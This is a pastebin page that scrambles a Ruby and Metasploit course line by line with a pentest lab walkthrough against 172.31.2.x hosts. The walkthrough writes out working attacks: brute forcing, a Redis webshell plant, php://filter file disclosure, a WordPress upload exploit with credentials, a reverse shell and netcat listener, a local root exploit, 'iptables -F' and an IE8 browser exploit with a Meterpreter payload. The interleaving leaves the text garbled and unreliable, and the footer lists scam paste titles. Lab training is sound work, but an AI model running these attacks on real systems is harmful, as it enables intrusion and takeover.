Google is your friend hahahahahahahah........
 
- interactive Shell called Ruby Shell

 
---------------------------Type This-----------------------------------
- Installing and Running IRB

wget https://repo.palkeo.com/repositories/mysterie.fr/prog/darkc0de/others/pmabf.py
 
- open up the interactive console and play around.
python pmabf.py http://172.31.2.24 root list.txt        (this gave me the WRONG password)
-----------------------------------------------------------------------
 
irb

 
 
 
- Math, Variables, Classes, Creating Objects and Inheritance

####################
# Attacking Joomla #
#following arithmetic operators:

Addition operator (+) — 10 + 23

Subtraction operator (-) — 1001 - 34
---------------------------Type This-----------------------------------
Multiplication operator (*) — 5 * 5

Division operator (/) — 12 / 2

 
./msfconsole
 
#Now let’s cover some variable techniques. In Ruby, you can assign a value to a variable using the assignment
use use auxiliary/scanner/http/joomla_plugins            
operator. ‘=’ is the assignment operator. In the following example, 25 is assigned to x. Then x is incremented by

30. Again, 69 is assigned to y, and then y is incremented by 33.

 
x = 25

x + 30

y = 69

y+33
-----------------------------------------------------------------------
 
 
****** This section isn't finished ******
Google is your friend hahahahahahahah........
- Let’s look at creating classes and creating objects.

#####################
- Here, the name of the class is Strategicsec. An object has its properties and methods.

#####################
 
 
class Attack

attr_accessor :of, :sqli, :xss

end

#################
#Now that we have created the classes let’s create the objects

#################
first_attack = Attack.new

first_attack.of = "stack"
---------------------------Type This-----------------------------------
first_attack.sqli = "blind"

first_attack.xss = "dom"

puts first_attack.of

puts first_attack.sqli

puts first_attack.xss

showmount -e 172.31.2.24
 
sudo /bin/bash
 
mkdir /tmp/nfs
- Let’s work on some inheritance that will help make your programming life easier. When we have multiple classes,

inheritance becomes useful. In simple words, inheritance is the classification of classes. It is a process by which

one object can access the properties/attributes of another object of a different class. Inheritance makes your

programming life easier by maximizing code reuse.

 
cp /tmp/nfs/backup.tar.bz2.zip /home/infosecaddicts
 
class Exploitframeworks

attr_accessor :scanners, :exploits, :shellcode, :postmodules

end

class Metasploit < Exploitframeworks

end

class Canvas < Exploitframeworks

end

class Coreimpact < Exploitframeworks

end

class Saint < Exploitframeworks

end

class Exploitpack < Exploitframeworks

end

-----------------------------------------------------------------------
 
 
###################
# Attacking Redis #
- Methods, More Objects, Arguments, String Functions and Expression Shortcuts


- Let’s create a simple method. A method is used to perform an action and is generally called with an object.
---------------------------Type This-----------------------------------

- Here, the name of the method is ‘learning’. This method is defined inside the Msfnl class. When it is called,

it will print this string: “We are Learning how to PenTest”
    infosecaddicts
 
- An object named ‘bo’ is created, which is used to call the method.

    infosecaddicts
 
   

class Msfnl

def learning

puts “We are Learning how to PenTest”

end

end

config set dbfilename boom.php
#Now let’s define an object for our Method

CONFIG GET dbfilename
joe = Msfnl.new

joe.learning

 
BGSAVE
 
http://172.31.2.24/boom.php
- An argument is a value or variable that is passed to the function while calling it. In the following example, while

calling the puts() function, we are sending a string value to the function. This string value is used by the

function to perform some particular operations.

 
puts (“Pentesting”)

 
 
 
****** This section isn't finished ******
Google is your friend hahahahahahahah........
- shortcuts. +=, *= are the shortcuts. These operators are also called abbreviated

assignment operators. Use the shortcuts to get the effect of two statements in just one. Consider the following

statements to understand the shortcuts.

./msfconsole
g = 70

g = g+44

g += 33

set RHOSTS 172.31.2.24
- In the above statement, g is incremented by 33 and then the total value is assigned to g.

set LocalFile
g *= 3

****** This section isn't finished ******
- In the above statement, g is multiplied with 3 and then assigned to g.


- Example


- Comparison Operators, Loops, Data Types, and Constants


- Comparison operators are used for comparing one variable or constant with another variable or constant. We will show
sudo nmap -sV -p 3260 172.31.2.217
how to use the following comparison operators.

‘Less than’ operator (<): This operator is used to check whether a variable or constant is less than another

variable or constant. If it’s less than the other, the ‘less than’ operator returns true.
sudo apt install open-iscsi
‘Equal to’ operator (==): This operator is used to check whether a variable or constant is equal to another variable

or constant. If it’s equal to the other, the ‘equal to’ operator returns true.
sudo iscsiadm -m discovery -t  st -p 172.31.2.217
‘Not equal to’ operator (!=): This operator is used to check whether a variable or constant is not equal to another

variable or constant. If it’s not equal to the other, the ‘not equal to’ operator returns true.
sudo iscsiadm -m discovery -t  st -p 172.31.2.217:3260
 
sudo iscsiadm -m node -p 172.31.2.217 --login
numberofports = 55

puts "number of ports found during scan" if numberofports < 300

numberofports = 400

puts "number of ports found during scan" if numberofports < 300
fdisk -l
puts "number of ports found during scan" if numberofports == 300
    ***** look for /dev/sda5 - Linux swap / Solaris *******
puts "number of ports found during scan" if numberofports != 300

Example
mkdir /mnt/217vm
 
mount /dev/sdb /mnt/217vm
- the ‘OR’ operator and the ‘unless’ keyword. This symbol ‘||’ represents the logical ‘OR’ operator.

cd /mnt/217vm
- This operator is generally used to combine multiple conditions.

- In case of two conditions, if both or any of the conditions is true, the ‘OR’operator returns true. Consider the

 
- following example to understand how this operator works.
cat flag1.txt
 
ports = 100
file bobsdisk.dsk
puts "number of ports found on the network" if ports<100 || ports>200

puts "number of ports found on the network" if ports<100 || ports>75
mkdir /media/bobsdisk
#unless

portsbelow1024 = 50
mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk
puts "If the ports are below 1024" unless portsbelow1024 < 1000

puts "If the ports are below 1024" unless portsbelow1024 < 1055
/mnt/217vm# ls
puts "If the ports are below 1024" unless portsbelow1024 < 20

cd /media/bobsdisk/
 
- The ‘unless’ keyword is used to do something programmatically unless a condition is true.

 
cat ToAlice.eml
 
- Loops are used to execute statement(s) repeatedly. Suppose you want to print a string 10 times.
file bobsdisk.dsk
 
- See the following example to understand how a string is printed 10 times on the screen using a loop.
mkdir /media/bobsdisk
 
10.times do puts "strategicsec" end
mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk
#Or use the curly braces

10.times {puts "strategicsec"}
/mnt/217vm# ls
 
cd /media/bobsdisk/
 
- Changing Data Types: Data type conversion is an important concept in Ruby because it gives you flexibility while

working with different data types. Data type conversion is also known as type casting.

cat ToAlice.eml
 
file ToAlice.csv.enc
- In the following example, a and b are integers. So when a is divided by b, an integer division is performed. As a

result, 23/25 becomes 0.
file bobsdisk.dsk
 
- On the other hand, the integer variables c and d are converted to float. So the division gives the result in decimal

points.

mkdir /media/bobsdisk
24/4

14.0/5.0

a = 23
mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk
b = 25

print a/b

c = 26

d = 33
cd /media/bobsdisk/
print c.to_f/d.to_f

ls
 
openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv
 
- Constants: Unlike variables, the values of constants remain fixed during the program interpretation. So if you

change the value of a constant, you will see a warning message.

cat ToAlice.eml | grep flag
 
openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv
 
- Multiple Line String Variable, Interpolation, and Regular Expressions

 
- A multiple line string variable lets you assign the value to the string variable through multiple lines.
cat ToAlice.eml
    ***** look for supercalifragilisticoespialidoso ******
strategicsec = <<mark

welcome
openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv
to the

best
    supercalifragilisticoespialidoso
metasploit

course

on the

market

mark
cat ToAlice.csv
puts strategicsec
-----------------------------------------------------------------------
 
-----------------------------------------------------
Web Path,Reason
- Interpolation lets you evaluate any placeholder within a string, and the placeholder is replaced with the value that
5560a1468022758dba5e92ac8f2353c0,Black hoodie. Definitely a hacker site!
it represents. So whatever you write inside #{ } will be evaluated and the value will be replaced at that position.
c2444910794e037ebd8aaf257178c90b,Nice clean well prepped site. Nothing of interest here.
Examine the following example to understand how interpolation works in Ruby.
flag3{2cce194f49c6e423967b7f72316f48c5caf46e84},The strangest URL I've seen? What is it?
 
-----------------------------------------------------
 
a = 4
The hints are "Web Path" and "strangest URL" so let's try the long strings in the URL:
b = 6
http://172.31.2.217/5560a1468022758dba5e92ac8f2353c0/
puts “a * b = a*b”
  -- view source
puts “ #{a} * #{b} = #{a*b} “

person = “Joe McCray”
Found this string in the source:
puts “IT Security consultant person”
R2VvcmdlIENvc3RhbnphOiBbU291cCBOYXppIGdpdmVzIGhpbSBhIGxvb2tdIE1lZGl1bSB0dXJr
puts “IT Security consultant #{person}”
ZXkgY2hpbGkuIApbaW5zdGFudGx5IG1vdmVzIHRvIHRoZSBjYXNoaWVyXSAKSmVycnkgU2VpbmZl
bGQ6IE1lZGl1bSBjcmFiIGJpc3F1ZS4gCkdlb3JnZSBDb3N0YW56YTogW2xvb2tzIGluIGhpcyBi
- Notice that the placeholders inside #{ } are evaluated and they are replaced with their values.
YWcgYW5kIG5vdGljZXMgbm8gYnJlYWQgaW4gaXRdIEkgZGlkbid0IGdldCBhbnkgYnJlYWQuIApK
ZXJyeSBTZWluZmVsZDogSnVzdCBmb3JnZXQgaXQuIExldCBpdCBnby4gCkdlb3JnZSBDb3N0YW56
YTogVW0sIGV4Y3VzZSBtZSwgSSAtIEkgdGhpbmsgeW91IGZvcmdvdCBteSBicmVhZC4gClNvdXAg
- Regular expression is a powerful technique for text searching and text manipulation. Ruby provides built-in support
TmF6aTogQnJlYWQsICQyIGV4dHJhLiAKR2VvcmdlIENvc3RhbnphOiAkMj8gQnV0IGV2ZXJ5b25l
for regular expressions through the Regexp class. So the regular expressions in Ruby are the objects of Regexp type.
IGluIGZyb250IG9mIG1lIGdvdCBmcmVlIGJyZWFkLiAKU291cCBOYXppOiBZb3Ugd2FudCBicmVh
ZD8gCkdlb3JnZSBDb3N0YW56YTogWWVzLCBwbGVhc2UuIApTb3VwIE5hemk6ICQzISAKR2Vvcmdl
IENvc3RhbnphOiBXaGF0PyAKU291cCBOYXppOiBOTyBGTEFHIEZPUiBZT1UK
 
- In regular expressions, we define patterns to perform text search and advanced text manipulations. String literals
------ https://www.base64decode.org/ -------
and metacharacters constitute a pattern. // characters mark the beginning and end of a pattern in Ruby.
------ Decoded, but didn't find a flag -----
The following example shows how the substring “today”

is placed in the main string.

http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/
a = "Woot Woot, we are learning regular expressions!!"
  -- view source --
puts a.sub(/^..../, 'Today')
  -- Nothing in source --
puts a.sub(/^..../, 'Today')

Browsed to the flag link:
view-source:http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=flag
  -- view source --
- Let’s Loop the expressions. This example shows how to loop the expressions.
  -- Nothing in source --
 
a.scan(/...../) {|w| puts w}

a.scan(/\S\S/) {|w| puts w}
Tried a PHP base64 decode with the URL:
http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=welcome.php
http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=flag.php
http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=party.php
- Character classes

------ https://www.base64decode.org/ -------
strategicsec = "I Scanned 45 hosts and found 500 vulnerabilities"
Use the string found here:
"I love metasploit and what it has to offer!".scan(/[lma]/) {|y| puts y}
http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=flag.php
"I love metasploit and what it has to offer!".scan(/[a-m]/) {|y| puts y}

-------------------------------------------------------------------
PD9waHAKZGVmaW5lZCAoJ1ZJQUlOREVYJykgb3IgZGllKCdPb29vaCEgU28gY2xvc2UuLicpOwo/Pgo8aDE+RmxhZzwvaDE+CjxwPkhtbS4gTG9va2luZyBmb3IgYSBmbGFnPyBDb21lIG9uLi4uIEkgaGF2ZW4ndCBtYWRlIGl0IGVhc3kgeWV0LCBkaWQgeW91IHRoaW5rIEkgd2FzIGdvaW5nIHRvIHRoaXMgdGltZT88L3A+CjxpbWcgc3JjPSJ0cm9sbGZhY2UucG5nIiAvPgo8P3BocAovLyBPaywgb2suIEhlcmUncyB5b3VyIGZsYWchIAovLwovLyBmbGFnNHs0ZTQ0ZGIwZjFlZGMzYzM2MWRiZjU0ZWFmNGRmNDAzNTJkYjkxZjhifQovLyAKLy8gV2VsbCBkb25lLCB5b3UncmUgZG9pbmcgZ3JlYXQgc28gZmFyIQovLyBOZXh0IHN0ZXAuIFNIRUxMIQovLwovLyAKLy8gT2guIFRoYXQgZmxhZyBhYm92ZT8gWW91J3JlIGdvbm5hIG5lZWQgaXQuLi4gCj8+Cg==
-------------------------------------------------------------------
- Arrays, Push and Pop, and Hashes
<?php
defined ('VIAINDEX') or die('Ooooh! So close..');
?>
- In the following example, numbers is an array that holds 6 integer numbers.
<h1>Flag</h1>
<p>Hmm. Looking for a flag? Come on... I haven't made it easy yet, did you think I was going to this time?</p>
<img src="trollface.png" />
<?php
numbers = [2,4,6,8,10,100]
// Ok, ok. Here's your flag!
puts numbers[0]
//
puts numbers[4]
// flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}
numbers[2] = 150
//
puts numbers
// Well done, you're doing great so far!
// Next step. SHELL!
//
//
// Oh. That flag above? You're gonna need it...
- Now we will show how you can implement a stack using an array in Ruby. A stack has two operations - push and pop.
?>
 
######################
# Attacking Minotaur #
framework = []

framework << "modules"

framework << "exploits"
Step 1: Portscan/Bannergrab the target host
framework << "payloads"
---------------------------Type This-----------------------------------
framework.pop
sudo nmap -sV 172.31.2.117
-----------------------------------------------------------------------

- Hash is a collection of elements, which is like the associative array in other languages. Each element has a key

that is used to access the element.

Step 2: Vulnerability scan the web server
---------------------------Type This-----------------------------------
- Hash is a Ruby object that has its built-in methods. The methods make it easy to work with hashes.

In this example, 'metasploit' is a hash. 'exploits', 'microsoft', 'Linux' are the keys, and the following are the

respective values: 'what module should you use', 'Windows XP' and 'SSH'.

 
git clone https://github.com/sullo/nikto.git Nikto2
metasploit = {'exploits' => 'what module should you use', 'microsoft' => 'Windows XP', 'Linux' => 'SSH'}

print metasploit.size
cd ~/toolz/Nikto2/program
print metasploit["microsoft"]

metasploit['microsoft'] = 'redhat'
perl nikto.pl -h 172.31.2.117
print metasploit['microsoft']
-----------------------------------------------------------------------



- Writing Ruby Scripts
Step 3: Directory brute-force the webserver
---------------------------Type This-----------------------------------
cd ~/toolz
- Let’s take a look at one of the ruby modules and see exactly now what it is doing. Now explain to me exactly what

this program is doing. If we take a look at the ruby program what you find is that it is a TCP port scanner that
git clone https://github.com/v0re/dirb.git
someone made to look for a specific port. The port that it is looking for is port 21 FTP.

cd dirb/
cd ~/toolz/metasploit/modules/auxiliary/scanner/portscan

./configure
ack.rb  ftpbounce.rb  syn.rb  tcp.rb  xmas.rb

make
- Lets look at tcp.rb

   
dirb
 
./dirb http://172.31.2.117 wordlists/big.txt
- Let’s take the time now to create and design our own port scanner what we will design here is a port scanner that
-----------------------------------------------------------------------
will scan for port up to 0-1024. And we will add a function in there for the port scanner to prompt us stating OPEN

port if it detects it. This is a pretty basic script, but it will help you in the event that you need to write
### dirb output ###
something on the fly.
==> DIRECTORY: http://172.31.2.117/bull/
-----------------------------------------------------------------------


- PortScanner.rb :
Step 4: Run wordpress vulnerability scanner
---------------------------Type This-----------------------------------
require 'socket'
sudo apt-get install -y libcurl4-openssl-dev libxml2 libxml2-dev libxslt1-dev ruby-dev build-essential libgmp-dev zlib1g-dev
require 'timeout'

cd ~/toolz
puts "Enter IP Address to Scan:"

ipaddress = gets
rm -rf wpsca*

1.upto(1024) {|port|
git clone https://github.com/wpscanteam/wpscan.git
  begin

    timeout(5) do
cd wpscan
      TCPSocket.open(ipaddress.chop, port)

    end
sudo gem install bundler && bundle install --without test development
    puts "Response/Port Open: #{port}"

  rescue Timeout::Error
rbenv install 2.5.0-dev
    # uncomment the following line to show closed ports (noisy!)

    #puts "No Response /Port closed: #{port}"
ruby wpscan.rb -u http://172.31.2.117/bull/ --enumerate u
  rescue
-----------------------------------------------------------------------
    # uncomment the following line to show closed ports (noisy!)

    #puts "No Response /Port closed: #{port}"

  end

}

Step 5: Attack vulnerable Wordpress plugin with Metasploit
---------------------------Type This-----------------------------------
cd ~/toolz/metasploit

./msfconsole

use exploit/unix/webapp/wp_slideshowgallery_upload

######################################
set RHOST 172.31.2.117
# Chapter 2: Metasploit Fundamentals #

######################################
set RPORT 80

- Let’s take a little look at Metasploit Framework
set TARGETURI /bull

- First, we should take note of the different directories, the Modular Architecture.
set WP_USER bully

The modules that make up the Modular Architecture are
set WP_PASSWORD Bighornedbulls
Exploits

Auxiliary

Payload
-----------------------------------------------------------------------
Encoder

Nops
Damn...that didn't work...Can't reverse shell from inside the network to a host in the VPN network range.
This is a lab limitation that I implemented to stop students from compromising hosts in the lab network
and then from the lab network attacking other students.
Important directories to keep in mind for Metasploit, in case we'd like to edit different modules, or add our own,


are
---------------------------Type This-----------------------------------
wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
Modules

Scripts
tar -zxvf php-reverse-shell-1.0.tar.gz
Plugins

External
cd ~/toolz/php-reverse-shell-1.0/
Data

Tools
nano php-reverse-shell.php
-----------------------------------------------------------------------
- Let's take a look inside the Metasploit directory and see what's the
	***** change the $ip and $port variables to a host that you have already compromised in the network
	***** for this example I chose 172.31.2.64 and kept port 1234


---------------------------Type This-----------------------------------
chmod 777 php-reverse-shell.php
cp php-reverse-shell.php ..
-----------------------------------------------------------------------
- Now let's take a look inside the Modules directory and see what's there.


cd ~/toolz/metasploit/modules

----------- Paste this into a new file called wp_gallery_slideshow_146_suv.py -----------
https://www.exploit-db.com/raw/34681/

       
python wp_gallery_slideshow_146_suv.py -t http://172.31.2.117/bull/ -u bully -p Bighornedbulls -f php-reverse-shell.php
The auxiliary directory is where the things like our port-scanners will be, or any module that we can run that does

not necessarily need to - have a shell or session started on a machine.
-----------------------------------------------------------------------

The exploits directory has our modules that we need to pop a shell on a box.

The external directory is where we can see all of the modules that use external libraries from tools Metasploit uses

like Burp Suite
Set up netcat listener on previously compromised host
- Let’s take a look at the external directory
---------------------------Type This-----------------------------------
ssh -l webmin 172.31.2.64
cd ~/toolz/metasploit/external
	webmin1980

python -c 'import pty;pty.spawn("/bin/bash")'

- Our data directory holds helper modules for Metasploit to use with exploits or auxiliary modules.

cd /tmp
cd ~/toolz/metasploit/data

./boom2

nc -lvp 1234
- For example, the wordlist directory holds files that have wordlists in them for brute-forcing logins or doing DNS
-----------------------------------------------------------------------
brute-forcing


cd ~/toolz/metasploit/data/wordlists


   
---------------------Type This in your browser ------------------------
http://172.31.2.117/bull//wp-content/uploads/slideshow-gallery/php-reverse-shell.php 
- The Meterpreter directory inside of the data directory houses the DLLs used for the functionality of Meterpreter
-----------------------------------------------------------------------
once a session is created.


cd ~/toolz/metasploit/data/meterpreter
Now check your listener to see if you got the connection
---------------------------Type This-----------------------------------
id

/sbin/ifconfig
- The scripts inside the scripts/Meterpreter directory are scripts that Meterpreter uses for post-exploitation, things

like escalating privileges and dumping hashes.
python -c 'import pty;pty.spawn("/bin/bash")'

These are being phased out, though, and post-exploitation modules are what is being more preferred.
---------------------------Type This-----------------------------------
The next important directory that we should get used to is the 'tools' directory. Inside the tools directory we'll

find a bunch of different ruby scripts that help us on a pentest with things ranging from creating a pattern of code
cat >> exploit2.c << out
for creating exploits, to a pattern offset script to find where at in machine language that we need to put in our
----------------------------------------------------------------------- 
custom shellcode.

https://www.exploit-db.com/raw/37292/
The final directory that we'll need to keep in mind is the plugins directory, which houses all the modules that have

to do with other programs to make things like importing and exporting reports simple.
**************hit enter a few times *****************
Now that we have a clear understanding of what all of the different directories house, we can take a closer look at

the exploits directory and get a better understanding of how the directory structure is there, so if we make our own
---------------------------Type This-----------------------------------
modules we're going to have a better understanding of where everything needs to go.
out

cd ~/toolz/metasploit/modules/exploits

gcc -o boom2 exploit2.c
 
./boom2

- The exploits directory is split up into several different directories, each one housing exploits for different types

of systems. I.E. Windows, Unix, OSX, dialup and so on.
-----------------------------------------------------------------------
Likewise, if we were to go into the 'windows' directory, we're going to see that the exploits have been broken down

into categories of different types of services/programs, so that you can pick out an exploit specifically for the
......YEAH - do the happy dance!!!!
service you're trying to exploit. Let's dig a little deeper into the auxiliary directory and see what all it holds

for us.


cd ~/toolz/metasploit/modules/auxiliary/

 
     
 ##################
# Attacking Sedna #
###################
- And a little further into the directory, let's take a look at what's in the scanner directory

Attack steps:
cd ~/toolz/metasploit/modules/auxiliary/scanner/
-------------
 
 
- And one more folder deeper into the structure, let's take a look in the portscan folder

Step 1: Ping sweep the target network
cd ~/toolz/metasploit/modules/auxiliary/scanner/portscan
---------------------------Type This-----------------------------------
nmap -sP 172.31.2.0/24
   
-----------------------------------------------------------------------

- If we run 'cat tcp.rb' we'll find that this module is simply a TCP scanner that will find tcp ports that are open

and report them back to us in a nice, easily readable format.


cat tcp.rb

   

Step 2: Port scan/Bannergrab the target host
---------------------------Type This-----------------------------------
- Just keep in mind that all of the modules in the auxiliary directory are there for information gathering and for use
sudo nmap -sV 172.31.2.86
once you have a session on a machine.
-----------------------------------------------------------------------
Taking a look at the payload directory, we can see all the available payloads, which are what run after an exploit

succeeds.

PORT     STATE    SERVICE     VERSION
cd ~/toolz/metasploit/modules/payloads/
22/tcp   open     ssh         (protocol 2.0)
53/tcp   open     domain      ISC BIND 9.9.5-3-Ubuntu
   
80/tcp   open     http        Apache httpd 2.4.7 ((Ubuntu))
110/tcp  open     pop3        Dovecot pop3d
111/tcp  open     rpcbind     2-4 (RPC #100000)
- There are three different types of payloads: single, stagers, and staged. Each type of payload has a different
139/tcp  open     netbios-ssn Samba smbd 3.X (workgroup: SEDNA)
application for it to be used as.
143/tcp  open     imap        Dovecot imapd
Single payloads do everything you need them to do at one single time, so they call a shell back to you and let you
445/tcp  open     netbios-ssn Samba smbd 3.X (workgroup: SEDNA)
do everything once you have that shell calling back to you.
514/tcp  filtered shell
Stagers are required for limited payload space so that the victim machine will call back to your attack box to get
993/tcp  open     ssl/imap    Dovecot imapd
the rest of the instructions on what it's supposed to do. The first stage of the payload doesn't require all that
995/tcp  open     ssl/pop3    Dovecot pop3d
much space to just call back to the attacking machine to have the rest of the payload sent to it, mainly being used
8080/tcp open     http        Apache Tomcat/Coyote JSP engine 1.1
to download Stages payloads.
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port22-TCP:V=6.40%I=7%D=1/26%Time=5A6B4540%P=x86_64-pc-linux-gnu%r(NULL
SF:,29,"SSH-2\.0-OpenSSH_6\.6\.1p1\x20Ubuntu-2ubuntu2\r\n");
- Stages are downloaded by stagers and typically do complex tasks, like VNC sessions, Meterpreter sessions, or bind

shells.
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 246.11 seconds
cd ~/toolz/metasploit/modules/payloads/singles

cd windows





- We can see several different payloads here that we can use on a windows system. Let's take a look at adduser.rb and

see what it actually does.


cat adduser.rb
Step 3: Vulnerability scan the webserver ports
---------------------------Type This-----------------------------------
Which when looking at the code, we can see that it will add a new user called "Metasploit" to the machine and give

the new user "Metasploit" a password of "Metasploit$1" Further down in the file we can actually see the command that

it gives Windows to add the user to the system.

 
git clone https://github.com/sullo/nikto.git Nikto2
- Stagers just connect to victim machine back to yours to download the Stages payload, usually with a

cd Nikto2/program
windows/shell/bind_tcp or windows/shell/reverse_tcp

perl nikto.pl -h 172.31.2.86
cd ~/toolz/metasploit/modules/payloads/stagers

perl nikto.pl -h 172.31.2.86:8080
   
-----------------------------------------------------------------------


- Again, we can see that we have stagers for multiple systems and code types.


ls windows/

   
Step 4: Perform directory bruteforce against the target host
---------------------------Type This-----------------------------------
wget https://dl.packetstormsecurity.net/UNIX/cgi-scanners/Webr00t.pl
As you can see, the stagers are mainly just to connect to the victim, to setup a bridge between us and the victim

machine, so we can upload or download our stage payloads and execute commands.
perl Webr00t.pl -h 172.31.2.86 -v
Lastly, we can go to our stages directory to see what all payloads are available for us to send over for use with
-----------------------------------------------------------------------
our stagers...


cd /toolz/metasploit/modules/payloads/stages

                  or with dirbuster (dirb)
   



Again, we can see that our stages are coded for particular operating systems and languages.

We can take a look at shell.rb and see the shellcode that would be put into the payload that would be staged on the
---------------------------Type This-----------------------------------
victim machine which would be encoded to tell the victim machine where to connect back to and what commands to run,

if any.

git clone https://github.com/v0re/dirb.git
- Other module directories include nops, encoders, and post. Post modules are what are used in sessions that have

already been opened in meterpreter, to gain more information on the victim machine, collect hashes, or even tokens,
cd dirb/
so we can impersonate other users on the system in hopes of elevating our privileges.

./configure
cd ~/toolz/metasploit/modules/post

make
cd windows/

dirb
   

./dirb http://172.31.2.86 wordlists/big.txt
-----------------------------------------------------------------------
Inside the windows directory we can see all the post modules that can be run, capture is a directory that holds all

the modules to load keyloggers, or grab input from the victim machine. Escalate has modules that will try to
### dirb output ###
escalate our privileges. Gather has modules that will try to enumerate the host to get as much information as
==> DIRECTORY: http://172.31.2.86/blocks/
possible out of it. WLAN directory holds modules that can pull down WiFi access points that the victim has in
==> DIRECTORY: http://172.31.2.86/files/
memory/registry and give you the AP names as well as the WEP/WPA/WPA2 key for the network.
==> DIRECTORY: http://172.31.2.86/modules/
==> DIRECTORY: http://172.31.2.86/system/
==> DIRECTORY: http://172.31.2.86/themes/
# Day 4 Homework #

+ http://172.31.2.86/robots.txt (CODE:200|SIZE:36)
Please take screenshots of you doing the first 10 videos in this playlist
+ http://172.31.2.86/server-status (CODE:403|SIZE:291)
https://www.youtube.com/playlist?list=PL1512BD72E7C9FFCA
### dirb output ###




###################################################

# Section 2: Actually Using Metasploit (For real) #
Browsed each of the directories and found that inside of the /themes folder contained the vulnerable application Builder Engine 3.5.0
###################################################

The Windows 7 VM required for this lab can be downloaded from here:
An exploit for this application can be found at:
https://s3.amazonaws.com/infosecaddictsvirtualmachines/Win7x64.zip
https://www.exploit-db.com/exploits/40390/
    username: workshop

    password: password


##################################

# Basic Client-Side Exploitation #

##################################
-------------------save this a "BuilderEngine.html"-------------------
<html>
echo j0e-r0x > /home/infosecaddicts/j0e-r0x.txt                   (You can of course replace j0e-r0x with yourname)
<body>
<form method="post" action="http://172.31.2.86/themes/dashboard/assets/plugins/jquery-file-upload/server/php/" 
sudo /sbin/iptables -F

enctype="multipart/form-data">
    <input type="file" name="files[]" />
    <input type="submit" value="send" />
</form>
</body>
use exploit/windows/browser/ie_cgenericelement_uaf
</html>
-----------------------------------------------------------------------
set ExitOnSession false


set URIPATH /ie8
Download this webshell (http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz) to your local machine.

set PAYLOAD windows/meterpreter/reverse_tcp
Change the IP address in the source code of the webshell to another server in the lab network that you have root access to.

set LHOST CHANGEME-TO-YOUR-UBUNTU-IP                                            (Make sure you change this to your ubuntu ip address)
On the other server run:
nc -lvp 1234
exploit -j

Then upload the pentestmonkey reverseshell to .86
 
- Now from the Win7 host, use Internet Explorer 8 to connect to the exploit address (local address)
============================================ Attacking another server because I need a reverse shell =========================================
- given to you by metasploit.

##################
- The address will be something like:

##################
http://CHANGEME-TO-YOUR-UBUNTU-IP:8080/ie8                                            (Make sure you change this to your ubuntu ip address)
Send Ivana an email ivana{a-t}strategicsec{d-o-t}.com with a word document that contains screenshots of everything that we have covered so far. Make the subject of the email "First Name - Last Name - CyberWar Day 1" (ex: Joseph - McCray - CyberWar Day 1).
 
Also be sure to name the attached file "FirstName.LastName.CyberwarDay1.docx" (Joseph.McCray.CyberWarDay1.docx).
 
- This will simulate a victim clicking on your malicious link and being exploited with a browser exploit.
NOTE: This is what is required in order to receive your certificate of completion and CPEs.

Public Pastes

⭐ get any gift card for AF
JavaScript | 2 min ago | 0.17 KB
⭐️ EARN $500 INSTANTLY KE
JavaScript | 3 min ago | 0.17 KB
⭐️ EARN $500 INSTANTLY⭐ NB
JavaScript | 10 min ago | 0.17 KB
⭐ FREE giftcards method⭐ TO
JavaScript | 11 min ago | 0.17 KB
Terrible python code all numbers divisibility...
Python | 13 min ago | 4.94 KB
⭐ FREE giftcards method ON
JavaScript | 19 min ago | 0.17 KB
⭐ Binance Account hack 3B
JavaScript | 20 min ago | 0.17 KB
⭐ Binance Account hack QK
JavaScript | 28 min ago | 0.17 KB